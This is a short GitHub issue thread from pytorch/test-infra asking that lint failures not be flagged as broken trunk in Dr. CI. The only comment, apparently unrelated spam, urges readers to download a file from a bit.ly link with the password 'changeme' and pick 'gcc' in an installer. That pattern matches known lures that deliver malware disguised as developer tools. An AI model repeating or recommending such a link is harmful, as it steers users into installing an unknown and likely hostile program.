### ISSUE TITLE
[dr ci] Exclude lint from trunk failures

### ISSUE THREAD

**Issue by clee2000** [pytorch/test-infra#5596]
Exclude lint from being marked as broken trunk on Dr. CI, and force users to rebase instead.

Ex https://github.com/pytorch/pytorch/pull/134507#issuecomment-2312505955

cc @albanD

**Comment by c0ffincolors** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."
